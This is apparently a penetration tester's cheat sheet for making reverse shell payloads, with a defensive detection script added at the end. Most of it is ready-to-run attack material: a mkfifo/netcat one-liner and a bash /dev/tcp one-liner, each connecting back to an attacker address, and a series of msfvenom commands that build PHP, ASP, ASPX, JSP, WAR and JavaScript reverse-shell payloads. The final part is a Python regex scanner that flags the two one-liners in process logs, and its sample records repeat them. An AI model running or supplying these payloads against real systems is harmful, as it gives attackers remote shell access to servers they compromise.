Create reverse shell payload
- Common webshell in Kali: /usr/share/webshells
- Ref: https://www.offensive-security.com/metasploit-unleashed/msfvenom/
- msfvenom -a x86 --platform Windows ...
- List payload: msfvenom -l payloads
- -i 10: 10 iterations
- -s maximum_bytes.
- -v shell_code_variable
- Program payload and executable payload: here
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- URL encode: https://www.url-encode-decode.com/
- (Tested - OK for PHP)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 5678 >/tmp/f
bash -i >& /dev/tcp/10.0.0.1/5678 0>&1
Refs:
PHP special reverse shell
- https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
- One liner code of the above at https://alamot.github.io/nineveh_writeup/#getting-shell
- Modify it, then use LFI to execute it remotely.
Web:
- PHP:
msfvenom -p php/reverse_php LHOST=Attacker_IP LPORT=Attacker_Listener_Port -f raw > shell.php
- (Not allowed) PHP 2:
msfvenom -p php/meterpreter_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port -f raw > shell.php
- Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage:
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
- ASP 1: (Unstaged - Can use nc)
msfvenom -p windows/shell_reverse_tcp LHOST=Attacker_IP LPORT=4444 -f asp > shell.asp
- ASP 2: (Staged - Need Metasploit multi handler)
msfvenom -p windows/shell/reverse_tcp LHOST=Attacker_IP LPORT=4444 -f asp > shell.asp
- ASP.NET: (Can use nc. Tested)
msfvenom -p windows/shell_reverse_tcp LHOST=Attacker_IP LPORT=6789 -f aspx > myshell.aspx
- (Not allowed) ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port -f asp > shell.asp
- JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port -f raw > shell.jsp
- WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port -f war > shell.war
- Unicode JS:
msfvenom -p windows/shell_reverse_tcp LHOST=Attacker_IP LPORT=Attacker_Listener_Port -f js_le -e generic/none
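Defender-side view of the two shell one-liners listed near the top of this page (the mkfifo/nc pipeline and the bash /dev/tcp redirect): an added example, not part of the original notes, that flags both in process-creation logs. The `user=... pid=... cmd=...` record layout, the timestamps and the host names are constructed assumptions; adapt the parsing to your own auditd, Sysmon for Linux or EDR export.

```python
import re

# Interactive shell whose I/O is redirected to bash's /dev/tcp/<host>/<port> pseudo-device.
DEV_TCP = re.compile(
    r"\b(?:ba)?sh\b[^|;]*\s-i\b.*?[<>]&?\s*/dev/tcp/(?P<host>[\w.\-]+)/(?P<port>\d{1,5})")
# mkfifo <p>; ... <p> | sh ... | nc <host> <port> > <p>  (named pipe looped through netcat)
FIFO_NC = re.compile(
    r"mkfifo\s+(?P<fifo>\S+?)\s*;.*?(?P=fifo)\s*\|\s*\S*sh\b[^|]*\|\s*"
    r"(?:nc|ncat|netcat)\b[^|>]*?\s(?P<host>[\w.\-]+)\s+(?P<port>\d{1,5})\s*>\s*(?P=fifo)")
RULES = (("dev_tcp_interactive_shell", DEV_TCP), ("fifo_netcat_shell", FIFO_NC))


def scan(lines):
    """Return one finding per record whose cmd= field matches a rule."""
    findings = []
    for line in lines:
        meta, sep, cmd = line.partition(" cmd=")
        if not sep:
            continue  # not a process-creation record
        fields = dict(tok.split("=", 1) for tok in meta.split() if "=" in tok)
        for name, rx in RULES:
            m = rx.search(cmd)
            if m:
                findings.append({
                    "rule": name,
                    "user": fields.get("user", "?"),
                    "pid": fields.get("pid", "?"),
                    "dest": f"{m['host']}:{m['port']}",
                })
                break
    return findings


# Constructed sample records (hypothetical format). The last three must NOT alert:
# a plain port check, a legitimate build FIFO, and a record with no cmd= field.
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z web01 user=www-data pid=4312 cmd=sh -c rm /tmp/f;mkfifo /tmp/f;"
    "cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 5678 >/tmp/f",
    "2024-01-01T10:02:11Z web01 user=www-data pid=4410 cmd=bash -c bash -i >& /dev/tcp/10.0.0.1/5678 0>&1",
    "2024-01-01T10:05:40Z app02 user=deploy pid=5120 cmd=bash -c echo > /dev/tcp/db01/5432",
    "2024-01-01T10:06:02Z ci01 user=build pid=5300 cmd=sh -c mkfifo /tmp/build.pipe; tar cf - src | gzip > /tmp/build.pipe",
    "2024-01-01T10:07:00Z web01 sshd[811]: Accepted publickey for deploy",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

A hit where `user` is the web server account (here `www-data`) is the case worth paging on, since that account has no normal reason to start an interactive shell with an outbound socket.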